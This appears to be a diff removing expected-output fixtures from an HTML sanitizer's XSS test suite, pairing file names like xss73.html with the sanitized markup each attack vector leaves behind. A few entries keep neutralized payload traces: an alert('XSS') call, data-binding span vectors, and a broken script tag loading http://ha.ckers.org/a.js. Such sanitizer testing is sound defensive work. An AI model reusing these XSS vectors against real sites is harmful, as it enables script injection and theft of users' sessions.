-<img src=" "/>
-xss20.html
-
-xss21.html
-
-xss22.html
-
-xss23.html
-<p>alert("XSS");//</p>
-xss24.html
-
-xss25.html
-
-xss26.html
-<img/>
-xss27.html
-
-xss28.html
-
-xss29.html
-
-xss30.html
-<input type="IMAGE"/>
-xss31.html
-
-xss32.html
-
-xss33.html
-<img/>
-xss34.html
-<img/>
-xss35.html
-<bgsound/>
-xss36.html
-<br/>
-xss37.html
-
-xss38.html
-
-xss39.html
-
-xss40.html
-
-xss41.html
-
-xss42.html
-
-xss43.html
-<xss/>
-xss44.html
-<ul><li>XSS
-</li></ul>
-xss45.html
-<img/>
-xss46.html
-<img/>
-xss47.html
-<img/>
-xss48.html
-
-xss49.html
-
-xss50.html
-
-xss51.html
-
-xss52.html
-
-xss53.html
-<table/>
-xss54.html
-<table><td/></table>
-xss55.html
-<div/>
-xss56.html
-<div/>
-xss57.html
-<div/>
-xss58.html
-<div/>
-xss59.html
-
-xss60.html
-<img/>
-xss61.html
-<xss/>
-xss62.html
-<p>exp/*<a/></p>
-xss63.html
-
-xss64.html
-
-xss65.html
-
-xss66.html
-
-xss67.html
-
-xss68.html
-
-xss69.html
-
-xss70.html
-
-xss71.html
-
-xss72.html
-<xss>XSS</xss>
-xss73.html
-<span datasrc="#I" datafld="C" dataformatas="HTML"/>
-xss74.html
-<span datasrc="#xss" datafld="B" dataformatas="HTML"/>
-xss75.html
-<span datasrc="#I" datafld="C" dataformatas="HTML"/>
-xss76.html
-
-
-xss77.html
-
-xss78.html
-<img/>
-xss79.html
-
-xss80.html
-
-xss81.html
-
-xss82.html
-
-xss83.html
-
-xss84.html
-
-xss85.html
-<p>PT SRC="http://ha.ckers.org/a.js"></p>
-xss95.html
-<a>Click me</a>
-xss96.html
-<a>Click me</a>
-xss97.html
-
-xss98.html
-
-xss99.html
-<img src=""/>
-style_xss01.html